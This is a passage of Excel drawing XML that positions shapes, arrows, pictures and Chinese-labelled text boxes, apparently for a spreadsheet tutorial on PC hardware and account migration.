      <xdr:col>4</xdr:col>
      <xdr:colOff>525780</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>45720</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="12" name="TextBox 11"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="8648700" y="830580"/>
          <a:ext cx="266700" cy="678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zh-CN" altLang="en-US" sz="1100"/>
            <a:t>光</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
        </a:p>
        <a:p>
          <a:pPr algn="ctr"/>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>驱</a:t>
          </a:r>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>3</xdr:col>
      <xdr:colOff>1539240</xdr:colOff>
      <xdr:row>5</xdr:row>
      <xdr:rowOff>22860</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>1615440</xdr:colOff>
      <xdr:row>5</xdr:row>
      <xdr:rowOff>99060</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="13" name="十字箭头 12"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="7307580" y="937260"/>
          <a:ext cx="76200" cy="76200"/>
        </a:xfrm>
        <a:prstGeom prst="quadArrow">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3</xdr:col>
      <xdr:colOff>1539240</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>99060</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>1615440</xdr:colOff>
      <xdr:row>6</xdr:row>
      <xdr:rowOff>175260</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="14" name="十字箭头 13"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="7307580" y="1196340"/>
          <a:ext cx="76200" cy="76200"/>
        </a:xfrm>
        <a:prstGeom prst="quadArrow">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3</xdr:col>
      <xdr:colOff>525780</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>152400</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>601980</xdr:colOff>
      <xdr:row>12</xdr:row>
      <xdr:rowOff>45720</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="15" name="十字箭头 14"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="6294120" y="2164080"/>
          <a:ext cx="76200" cy="76200"/>
        </a:xfrm>
        <a:prstGeom prst="quadArrow">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3</xdr:col>
      <xdr:colOff>2255520</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>152400</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>2331720</xdr:colOff>
      <xdr:row>12</xdr:row>
      <xdr:rowOff>45720</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="16" name="十字箭头 15"/>
        <xdr:cNvSpPr/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="8023860" y="2164080"/>
          <a:ext cx="76200" cy="76200"/>
        </a:xfrm>
        <a:prstGeom prst="quadArrow">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wsDr>
</file>

<file path=xl/drawings/drawing83.xml><?xml version="1.0" encoding="utf-8"?>
<xdr:wsDr xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>7</xdr:col>
      <xdr:colOff>213360</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>60960</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>7</xdr:col>
      <xdr:colOff>342900</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>7620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5151120" y="60960"/>
          <a:ext cx="129540" cy="129540"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/drawings/drawing8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129540</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>129540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648700" y="0"/>
          <a:ext cx="129540" cy="129540"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/drawings/drawing85.xml><?xml version="1.0" encoding="utf-8"?>
<xdr:wsDr xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>0</xdr:col>
      <xdr:colOff>274320</xdr:colOff>
      <xdr:row>2</xdr:row>
      <xdr:rowOff>45720</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>5646420</xdr:colOff>
      <xdr:row>20</xdr:row>
      <xdr:rowOff>45720</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="13317" name="Picture 5"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1" cstate="print"/>
        <a:srcRect l="12963" t="25545" r="14620" b="7165"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="274320" y="411480"/>
          <a:ext cx="5661660" cy="3291840"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>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3</xdr:col>
      <xdr:colOff>1744980</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>38100</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</xdr:col>
      <xdr:colOff>1874520</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>167640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7330440" y="38100"/>
          <a:ext cx="129540" cy="129540"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/drawings/drawing87.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88.xml><?xml version="1.0" encoding="utf-8"?>
<xdr:wsDr xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>5</xdr:col>
      <xdr:colOff>3954780</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>53340</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>5</xdr:col>
      <xdr:colOff>4084320</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>182880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092440" y="53340"/>
          <a:ext cx="129540" cy="129540"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>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90.xml><?xml version="1.0" encoding="utf-8"?>
<xdr:wsDr xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>3</xdr:col>
      <xdr:colOff>8001000</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>30480</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>3</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91.xml><?xml version="1.0" encoding="utf-8"?>
<xdr:wsDr xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>1051560</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>53340</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>2423160</xdr:colOff>
      <xdr:row>16</xdr:row>
      <xdr:rowOff>175260</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="2" name="TextBox 1"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="1341120" y="2065020"/>
          <a:ext cx="1371600" cy="1036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zh-CN" altLang="en-US" sz="1100"/>
            <a:t>旧</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t>PC</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>上的用户帐户</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
        </a:p>
        <a:p>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t>WWU</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t>You</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>3025140</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>53340</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>1</xdr:col>
      <xdr:colOff>4396740</xdr:colOff>
      <xdr:row>16</xdr:row>
      <xdr:rowOff>175260</xdr:rowOff>
    </xdr:to>
    <xdr:sp macro="" textlink="">
      <xdr:nvSpPr>
        <xdr:cNvPr id="3" name="TextBox 2"/>
        <xdr:cNvSpPr txBox="1"/>
      </xdr:nvSpPr>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="3314700" y="2065020"/>
          <a:ext cx="1371600" cy="1036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zh-CN" altLang="en-US" sz="1100"/>
            <a:t>新</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t>PC</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>上的用户帐户</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
        </a:p>
        <a:p>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t>WWU</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="1100"/>
            <a:t>（可选）</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
        </a:p>
        <a:p>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100"/>
        </a:p>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" altLang="zh-CN" sz="1100"/>
            <a:t>You</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="zh-CN" sz="1100">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>（可选）</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100"/>
        </a:p>
      </xdr:txBody>
    </xdr:sp>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/drawings/drawing92.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93.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94.xml><?xml version="1.0" encoding="utf-8"?>
<xdr:wsDr xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>5</xdr:col>
      <xdr:colOff>3345180</xdr:colOff>
      <xdr:row>33</xdr:row>
      <xdr:rowOff>144780</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>6</xdr:col>
      <xdr:colOff>274320</xdr:colOff>
      <xdr:row>41</xdr:row>
      <xdr:rowOff>53340</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="32769" name="Picture 1" descr="http://imgsrc.baidu.com/baike/abpic/item/4e0b3ea42c94b5b59152ee5f.jpg"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="6537960" y="8801100"/>
          <a:ext cx="1897380" cy="1371600"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>5</xdr:col>
      <xdr:colOff>213360</xdr:colOff>
      <xdr:row>34</xdr:row>
      <xdr:rowOff>106680</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>5</xdr:col>
      <xdr:colOff>1851660</xdr:colOff>
      <xdr:row>41</xdr:row>
      <xdr:rowOff>58522</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="32770" name="Picture 2" descr="http://imgsrc.baidu.com/baike/abpic/item/4e0b3ea4319aa6b69152ee58.jpg"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId2" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="3406140" y="9144000"/>
          <a:ext cx="1638300" cy="1232002"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>6</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>6</xdr:col>
      <xdr:colOff>129540</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>129540</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="5" name="图片 4" descr="01.gif">
          <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
        </xdr:cNvPr>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId4" cstate="print"/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr>
        <a:xfrm>
          <a:off x="8161020" y="0"/>
          <a:ext cx="129540" cy="129540"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/drawings/drawing95.xml><?xml version="1.0" encoding="utf-8"?>
<xdr:wsDr xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>4</xdr:col>
      <xdr:colOff>4724400</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>137160</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>4853940</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>68580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7185660" y="137160"/>
          <a:ext cx="129540" cy="129540"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/drawings/drawing96.xml><?xml version="1.0" encoding="utf-8"?>
<xdr:wsDr xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>4</xdr:col>
      <xdr:colOff>4724400</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>137160</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>4853940</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>68580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7185660" y="137160"/>
          <a:ext cx="129540" cy="129540"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>4</xdr:col>
      <xdr:colOff>3985260</xdr:colOff>
      <xdr:row>4</xdr:row>
      <xdr:rowOff>167640</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>5890260</xdr:colOff>
      <xdr:row>11</xdr:row>
      <xdr:rowOff>83820</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="29697" name="Picture 1" descr="http://imgsrc.baidu.com/baike/abpic/item/f99dcf00ccb7f402728b650e.jpg"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId3" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="6446520" y="556260"/>
          <a:ext cx="1905000" cy="1249680"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/drawings/drawing97.xml><?xml version="1.0" encoding="utf-8"?>
<xdr:wsDr xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>4</xdr:col>
      <xdr:colOff>4724400</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>137160</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>4853940</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>68580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7185660" y="137160"/>
          <a:ext cx="129540" cy="129540"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>4</xdr:col>
      <xdr:colOff>3436620</xdr:colOff>
      <xdr:row>10</xdr:row>
      <xdr:rowOff>99060</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>5341620</xdr:colOff>
      <xdr:row>19</xdr:row>
      <xdr:rowOff>22860</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="34817" name="Picture 1" descr="http://imgsrc.baidu.com/baike/abpic/item/8cf0d5134d0e8e0ddd5401ad.jpg"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId3" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="5897880" y="3718560"/>
          <a:ext cx="1905000" cy="1638300"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/drawings/drawing98.xml><?xml version="1.0" encoding="utf-8"?>
<xdr:wsDr xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>4</xdr:col>
      <xdr:colOff>4724400</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>137160</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>5</xdr:col>
      <xdr:colOff>129540</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>68580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7185660" y="137160"/>
          <a:ext cx="129540" cy="129540"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>6</xdr:col>
      <xdr:colOff>464820</xdr:colOff>
      <xdr:row>9</xdr:row>
      <xdr:rowOff>15240</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>9</xdr:col>
      <xdr:colOff>533400</xdr:colOff>
      <xdr:row>16</xdr:row>
      <xdr:rowOff>114300</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="30721" name="Picture 1" descr="http://imgsrc.baidu.com/baike/abpic/item/8474fbddc833d5fc76c63812.jpg"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId3" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="6675120" y="2872740"/>
          <a:ext cx="1897380" cy="1432560"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/drawings/drawing99.xml><?xml version="1.0" encoding="utf-8"?>
<xdr:wsDr xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>4</xdr:col>
      <xdr:colOff>4724400</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>137160</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>4853940</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>68580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7185660" y="137160"/>
          <a:ext cx="129540" cy="129540"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>4</xdr:col>
      <xdr:colOff>4290060</xdr:colOff>
      <xdr:row>8</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>5</xdr:col>
      <xdr:colOff>236220</xdr:colOff>
      <xdr:row>16</xdr:row>
      <xdr:rowOff>60960</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="35841" name="Picture 1" descr="http://imgsrc.baidu.com/baike/abpic/item/a6aed01b8f149ac3af513318.jpg"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId3" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="6751320" y="4000500"/>
          <a:ext cx="1905000" cy="1584960"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
</xdr:wsDr>
</file>

<file path=xl/drawings/drawing100.xml><?xml version="1.0" encoding="utf-8"?>
<xdr:wsDr xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>4</xdr:col>
      <xdr:colOff>5730240</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>38100</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>4</xdr:col>
      <xdr:colOff>5859780</xdr:colOff>
      <xdr:row>0</xdr:row>
      <xdr:rowOff>167640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191500" y="38100"/>
          <a:ext cx="129540" cy="129540"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic>
    <xdr:clientData/>
  </xdr:twoCellAnchor>
  <xdr:twoCellAnchor editAs="oneCell">
    <xdr:from>
      <xdr:col>4</xdr:col>
      <xdr:colOff>4084320</xdr:colOff>
      <xdr:row>7</xdr:row>
      <xdr:rowOff>327660</xdr:rowOff>
    </xdr:from>
    <xdr:to>
      <xdr:col>5</xdr:col>
      <xdr:colOff>30480</xdr:colOff>
      <xdr:row>14</xdr:row>
      <xdr:rowOff>38100</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="25601" name="Picture 1" descr="http://imgsrc.baidu.com/baike/abpic/item/dc854fda23b01beab6fd4889.jpg"/>
        <xdr:cNvPicPr>
          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
        </xdr:cNvPicPr>
      </xdr:nvPicPr>
      <xdr:blipFill>
        <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId3" cstate="print"/>
        <a:srcRect/>
        <a:stretch>
          <a:fillRect/>
        </a:stretch>
      </xdr:blipFill>
      <xdr:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="6545580" y="1836420"/>
          <a:ext cx="1905000" cy="1226820"/>
        </a:xfrm>
